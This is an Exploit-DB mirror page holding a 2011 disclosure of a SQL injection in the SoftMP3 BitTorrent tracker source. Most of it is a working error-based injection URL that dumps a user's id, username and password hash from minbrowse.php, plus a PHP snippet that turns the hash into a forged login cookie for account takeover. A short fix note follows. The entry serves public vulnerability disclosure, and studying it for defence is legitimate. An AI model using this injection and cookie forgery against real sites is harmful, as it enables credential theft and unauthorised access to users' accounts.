bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17209.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
2.1 KiB
Text
Raw Blame History

# Exploit Title: SOFTMP3 source code SQL injection
# Date: 23/04/2011
# Author: mArTi
# Software Link: http://softmp3.org/
# Version: No others versions available...
# Tested on: Windows / Unix
/.................................../ Introduction /.................................../
SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection.
Here's the PoC and the Fix
/.................................../ PoC /.................................../
-> SQL http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
-----> Then you can use this to connect as the user you want by the passhash you got and setting the following cookies :
uid=id
pass=encrypted passhash (see down)
---------> getting encrypted passhash to connect with the cookies
<?php
$test=md5($HTTP_SERVER_VARS["REMOTE_ADDR"]."passhash"."hejsan".$HTTP_SERVER_VARS["REMOTE_ADDR"]);
echo "pass cookie is $test"
?>
/.................................../ FIX /.................................../
Delete /minbrowse.php (useless).
BTW, if you want to protect the cookies, just change the cookie encryption in bittorent.php file (like the "hejsan" key or the order of terms in encryption)
-------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------
Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, you'll know where to find me.
-------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------
Reference in a new issue View git blame Copy permalink